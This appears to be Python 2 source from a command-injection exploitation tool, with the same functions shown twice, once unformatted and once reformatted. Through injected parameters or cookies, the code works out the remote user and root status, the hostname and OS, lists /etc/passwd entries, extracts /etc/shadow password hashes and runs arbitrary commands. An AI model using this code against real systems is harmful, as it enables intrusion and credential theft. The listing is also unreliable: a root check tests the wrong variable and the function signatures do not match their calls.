def current_user(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell):
cmd = settings.CURRENT_USER
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
check_how_long, output = tfb_injector.cookie_injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
else:
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
cu_account = output
if cu_account:
cu_account = "".join(str(p) for p in output)
# Check if the user have super privilleges.
if menu.options.is_root:
cmd = settings.ISROOT
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
is_root = output
if is_root:
sys.stdout.write(Style.BRIGHT + "\n\n (!) The current user is " + Style.UNDERLINE + cu_account + Style.RESET_ALL)
if is_root != "0":
sys.stdout.write(Style.BRIGHT + " and it is " + Style.UNDERLINE + "not" + Style.RESET_ALL + Style.BRIGHT + " privilleged" + Style.RESET_ALL + ".\n")
sys.stdout.flush()
else:
sys.stdout.write(Style.BRIGHT + " and it is " + Style.UNDERLINE + "" + Style.RESET_ALL + Style.BRIGHT + " privilleged" + Style.RESET_ALL + ".\n")
sys.stdout.flush()
else:
sys.stdout.write(Style.BRIGHT + "\n\n (!) The current user is " + Style.UNDERLINE + cu_account + Style.RESET_ALL + ".\n")
sys.stdout.flush()
def current_user(separator, maxlen, TAG, prefix, suffix, delay,
http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
alter_shell):
cmd = settings.CURRENT_USER
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(
menu.options.cookie)
check_how_long, output = tfb_injector.cookie_injection(
separator, maxlen, TAG, cmd, prefix, suffix, delay,
http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
alter_shell)
else:
check_how_long, output = tfb_injector.injection(
separator, maxlen, TAG, cmd, prefix, suffix, delay,
http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
alter_shell)
cu_account = output
if cu_account:
cu_account = "".join(str(p) for p in output)
# Check if the user have super privilleges.
if menu.options.is_root:
cmd = settings.ISROOT
check_how_long, output = tfb_injector.injection(
separator, maxlen, TAG, cmd, prefix, suffix, delay,
http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
alter_shell)
is_root = output
if is_root:
sys.stdout.write(Style.BRIGHT +
"\n\n (!) The current user is " +
Style.UNDERLINE + cu_account +
Style.RESET_ALL)
if is_root != "0":
sys.stdout.write(Style.BRIGHT + " and it is " +
Style.UNDERLINE + "not" +
Style.RESET_ALL + Style.BRIGHT +
" privilleged" + Style.RESET_ALL + ".\n")
sys.stdout.flush()
else:
sys.stdout.write(Style.BRIGHT + " and it is " +
Style.UNDERLINE + "" + Style.RESET_ALL +
Style.BRIGHT + " privilleged" +
Style.RESET_ALL + ".\n")
sys.stdout.flush()
else:
sys.stdout.write(Style.BRIGHT + "\n\n (!) The current user is " +
Style.UNDERLINE + cu_account + Style.RESET_ALL +
".\n")
sys.stdout.flush()
def do_check(separator,maxlen,TAG,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell):
# Hostname enumeration
if menu.options.hostname:
cmd = settings.HOSTNAME
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
shell = output
if shell:
shell = "".join(str(p) for p in output)
sys.stdout.write(Style.BRIGHT + "\n\n (!) The hostname is " + Style.UNDERLINE + shell + Style.RESET_ALL + ".\n")
sys.stdout.flush()
# "Retrieve certain system information (operating system, hardware platform)
if menu.options.sys_info:
cmd = settings.RECOGNISE_OS
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
target_os = output
if target_os:
target_os = "".join(str(p) for p in output)
if target_os == "Linux":
cmd = settings.RECOGNISE_HP
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
target_arch = output
if target_arch:
target_arch = "".join(str(p) for p in target_arch)
sys.stdout.write(Style.BRIGHT + "\n\n (!) The target operating system is " + Style.UNDERLINE + target_os + Style.RESET_ALL)
sys.stdout.write(Style.BRIGHT + " and the hardware platform is " + Style.UNDERLINE + target_arch + Style.RESET_ALL + ".\n")
sys.stdout.flush()
else:
sys.stdout.write(Style.BRIGHT + "\n (!) The target operating system is " + Style.UNDERLINE + target_os + Style.RESET_ALL + ".\n")
sys.stdout.flush()
# The current user enumeration
if menu.options.current_user:
cmd = settings.CURRENT_USER
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
check_how_long, output = tfb_injector.cookie_injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
else:
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
cu_account = output
if cu_account:
cu_account = "".join(str(p) for p in output)
# Check if the user have super privilleges.
if menu.options.is_root:
cmd = settings.ISROOT
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
if shell:
sys.stdout.write(Style.BRIGHT + "\n\n (!) The current user is " + Style.UNDERLINE + cu_account + Style.RESET_ALL)
if shell != "0":
sys.stdout.write(Style.BRIGHT + " and it is " + Style.UNDERLINE + "not" + Style.RESET_ALL + Style.BRIGHT + " privilleged" + Style.RESET_ALL + ".\n")
sys.stdout.flush()
else:
sys.stdout.write(Style.BRIGHT + " and it is " + Style.UNDERLINE + "" + Style.RESET_ALL + Style.BRIGHT + " privilleged" + Style.RESET_ALL + ".\n")
sys.stdout.flush()
else:
sys.stdout.write(Style.BRIGHT + "\n\n (!) The current user is " + Style.UNDERLINE + cu_account + Style.RESET_ALL + ".\n")
sys.stdout.flush()
# System users enumeration
if menu.options.users:
sys.stdout.write("\n(*) Fetching '" + settings.PASSWD_FILE + "' to enumerate users entries... ")
sys.stdout.flush()
cmd = settings.SYS_USERS
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
sys_users = output
if sys_users :
sys_users = "".join(str(p) for p in sys_users)
sys_users = sys_users.replace("(@)","\n")
sys_users = sys_users.split( )
if len(sys_users) != 0 :
sys.stdout.write(Style.BRIGHT + "\n(!) Identified " + str(len(sys_users)) + " entries in '" + settings.PASSWD_FILE + "'.\n" + Style.RESET_ALL)
sys.stdout.flush()
count = 0
for line in sys_users:
count = count + 1
fields = line.split(":")
# System users privileges enumeration
if menu.options.privileges:
if int(fields[1]) == 0:
is_privilleged = Style.RESET_ALL + " is" + Style.BRIGHT + " root user "
elif int(fields[1]) > 0 and int(fields[1]) < 99 :
is_privilleged = Style.RESET_ALL + " is" + Style.BRIGHT + " system user "
elif int(fields[1]) >= 99 and int(fields[1]) < 65534 :
if int(fields[1]) == 99 or int(fields[1]) == 60001 or int(fields[1]) == 65534:
is_privilleged = Style.RESET_ALL + " is" + Style.BRIGHT + " anonymous user "
elif int(fields[1]) == 60002:
is_privilleged = Style.RESET_ALL + " is" + Style.BRIGHT + " non-trusted user "
else:
is_privilleged = Style.RESET_ALL + " is" + Style.BRIGHT + " regular user "
else :
is_privilleged = ""
else :
is_privilleged = ""
print " ("+str(count)+") '" + Style.BRIGHT + Style.UNDERLINE + fields[0]+ Style.RESET_ALL + "'" + Style.BRIGHT + is_privilleged + Style.RESET_ALL + "(uid=" + fields[1] + ").Home directory is in '" + Style.BRIGHT + fields[2]+ Style.RESET_ALL + "'."
else:
print "\n" + Back.RED + "(x) Error: Cannot open '" + settings.PASSWD_FILE + "'." + Style.RESET_ALL
# System users enumeration
if menu.options.passwords:
sys.stdout.write("\n(*) Fetching '" + settings.SHADOW_FILE + "' to enumerate users password hashes... ")
sys.stdout.flush()
cmd = settings.SYS_PASSES
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
sys_passes = output
if sys_passes :
sys_passes = "".join(str(p) for p in sys_passes)
sys_passes = sys_passes.replace("(@)","\n")
sys_passes = sys_passes.split( )
if len(sys_passes) != 0 :
sys.stdout.write(Style.BRIGHT + "\n(!) Identified " + str(len(sys_passes)) + " entries in '" + settings.SHADOW_FILE + "'.\n" + Style.RESET_ALL)
sys.stdout.flush()
count = 0
for line in sys_passes:
count = count + 1
fields = line.split(":")
if fields[1] != "*" and fields[1] != "!!" and fields[1] != "":
print " ("+str(count)+") " + Style.BRIGHT + fields[0]+ Style.RESET_ALL + " : " + Style.BRIGHT + fields[1]+ Style.RESET_ALL
else:
print "\n" + Back.RED + "(x) Error: Cannot open '" + settings.SHADOW_FILE + "'." + Style.RESET_ALL
# Single os-shell execution
if menu.options.os_cmd:
cmd = menu.options.os_cmd
check_how_long,output = tfb_injector.injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell)
shell = output
if shell:
if menu.options.verbose:
print ""
shell = "".join(str(p) for p in shell)
print "\n\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
sys.exit(0)
# eof
def do_check(separator, maxlen, TAG, delay, http_request_method, url,
vuln_parameter, OUTPUT_TEXTFILE, alter_shell):
# Hostname enumeration
if menu.options.hostname:
cmd = settings.HOSTNAME
check_how_long, output = tfb_injector.injection(
separator, maxlen, TAG, cmd, delay, http_request_method, url,
vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
shell = output
if shell:
shell = "".join(str(p) for p in output)
sys.stdout.write(Style.BRIGHT + "\n\n (!) The hostname is " +
Style.UNDERLINE + shell + Style.RESET_ALL + ".\n")
sys.stdout.flush()
# "Retrieve certain system information (operating system, hardware platform)
if menu.options.sys_info:
cmd = settings.RECOGNISE_OS
check_how_long, output = tfb_injector.injection(
separator, maxlen, TAG, cmd, delay, http_request_method, url,
vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
target_os = output
if target_os:
target_os = "".join(str(p) for p in output)
if target_os == "Linux":
cmd = settings.RECOGNISE_HP
check_how_long, output = tfb_injector.injection(
separator, maxlen, TAG, cmd, delay, http_request_method,
url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
target_arch = output
if target_arch:
target_arch = "".join(str(p) for p in target_arch)
sys.stdout.write(
Style.BRIGHT +
"\n\n (!) The target operating system is " +
Style.UNDERLINE + target_os + Style.RESET_ALL)
sys.stdout.write(Style.BRIGHT +
" and the hardware platform is " +
Style.UNDERLINE + target_arch +
Style.RESET_ALL + ".\n")
sys.stdout.flush()
else:
sys.stdout.write(Style.BRIGHT +
"\n (!) The target operating system is " +
Style.UNDERLINE + target_os +
Style.RESET_ALL + ".\n")
sys.stdout.flush()
# The current user enumeration
if menu.options.current_user:
cmd = settings.CURRENT_USER
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(
menu.options.cookie)
check_how_long, output = tfb_injector.cookie_injection(
separator, maxlen, TAG, cmd, delay, http_request_method, url,
vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
else:
check_how_long, output = tfb_injector.injection(
separator, maxlen, TAG, cmd, delay, http_request_method, url,
vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
cu_account = output
if cu_account:
cu_account = "".join(str(p) for p in output)
# Check if the user have super privilleges.
if menu.options.is_root:
cmd = settings.ISROOT
check_how_long, output = tfb_injector.injection(
separator, maxlen, TAG, cmd, delay, http_request_method,
url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
if shell:
sys.stdout.write(Style.BRIGHT +
"\n\n (!) The current user is " +
Style.UNDERLINE + cu_account +
Style.RESET_ALL)
if shell != "0":
sys.stdout.write(Style.BRIGHT + " and it is " +
Style.UNDERLINE + "not" +
Style.RESET_ALL + Style.BRIGHT +
" privilleged" + Style.RESET_ALL +
".\n")
sys.stdout.flush()
else:
sys.stdout.write(Style.BRIGHT + " and it is " +
Style.UNDERLINE + "" +
Style.RESET_ALL + Style.BRIGHT +
" privilleged" + Style.RESET_ALL +
".\n")
sys.stdout.flush()
else:
sys.stdout.write(Style.BRIGHT +
"\n\n (!) The current user is " +
Style.UNDERLINE + cu_account +
Style.RESET_ALL + ".\n")
sys.stdout.flush()
# System users enumeration
if menu.options.users:
sys.stdout.write("\n(*) Fetching '" + settings.PASSWD_FILE +
"' to enumerate users entries... ")
sys.stdout.flush()
cmd = settings.SYS_USERS
check_how_long, output = tfb_injector.injection(
separator, maxlen, TAG, cmd, delay, http_request_method, url,
vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
sys_users = output
if sys_users:
sys_users = "".join(str(p) for p in sys_users)
sys_users = sys_users.replace("(@)", "\n")
sys_users = sys_users.split()
if len(sys_users) != 0:
sys.stdout.write(Style.BRIGHT + "\n(!) Identified " +
str(len(sys_users)) + " entries in '" +
settings.PASSWD_FILE + "'.\n" +
Style.RESET_ALL)
sys.stdout.flush()
count = 0
for line in sys_users:
count = count + 1
fields = line.split(":")
# System users privileges enumeration
if menu.options.privileges:
if int(fields[1]) == 0:
is_privilleged = Style.RESET_ALL + " is" + Style.BRIGHT + " root user "
elif int(fields[1]) > 0 and int(fields[1]) < 99:
is_privilleged = Style.RESET_ALL + " is" + Style.BRIGHT + " system user "
elif int(fields[1]) >= 99 and int(fields[1]) < 65534:
if int(fields[1]) == 99 or int(
fields[1]) == 60001 or int(
fields[1]) == 65534:
is_privilleged = Style.RESET_ALL + " is" + Style.BRIGHT + " anonymous user "
elif int(fields[1]) == 60002:
is_privilleged = Style.RESET_ALL + " is" + Style.BRIGHT + " non-trusted user "
else:
is_privilleged = Style.RESET_ALL + " is" + Style.BRIGHT + " regular user "
else:
is_privilleged = ""
else:
is_privilleged = ""
print " (" + str(
count
) + ") '" + Style.BRIGHT + Style.UNDERLINE + fields[
0] + Style.RESET_ALL + "'" + Style.BRIGHT + is_privilleged + Style.RESET_ALL + "(uid=" + fields[
1] + ").Home directory is in '" + Style.BRIGHT + fields[
2] + Style.RESET_ALL + "'."
else:
print "\n" + Back.RED + "(x) Error: Cannot open '" + settings.PASSWD_FILE + "'." + Style.RESET_ALL
# System users enumeration
if menu.options.passwords:
sys.stdout.write("\n(*) Fetching '" + settings.SHADOW_FILE +
"' to enumerate users password hashes... ")
sys.stdout.flush()
cmd = settings.SYS_PASSES
check_how_long, output = tfb_injector.injection(
separator, maxlen, TAG, cmd, delay, http_request_method, url,
vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
sys_passes = output
if sys_passes:
sys_passes = "".join(str(p) for p in sys_passes)
sys_passes = sys_passes.replace("(@)", "\n")
sys_passes = sys_passes.split()
if len(sys_passes) != 0:
sys.stdout.write(Style.BRIGHT + "\n(!) Identified " +
str(len(sys_passes)) + " entries in '" +
settings.SHADOW_FILE + "'.\n" +
Style.RESET_ALL)
sys.stdout.flush()
count = 0
for line in sys_passes:
count = count + 1
fields = line.split(":")
if fields[1] != "*" and fields[1] != "!!" and fields[
1] != "":
print " (" + str(count) + ") " + Style.BRIGHT + fields[
0] + Style.RESET_ALL + " : " + Style.BRIGHT + fields[
1] + Style.RESET_ALL
else:
print "\n" + Back.RED + "(x) Error: Cannot open '" + settings.SHADOW_FILE + "'." + Style.RESET_ALL
# Single os-shell execution
if menu.options.os_cmd:
cmd = menu.options.os_cmd
check_how_long, output = tfb_injector.injection(
separator, maxlen, TAG, cmd, delay, http_request_method, url,
vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
shell = output
if shell:
if menu.options.verbose:
print ""
shell = "".join(str(p) for p in shell)
print "\n\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
sys.exit(0)
# eof
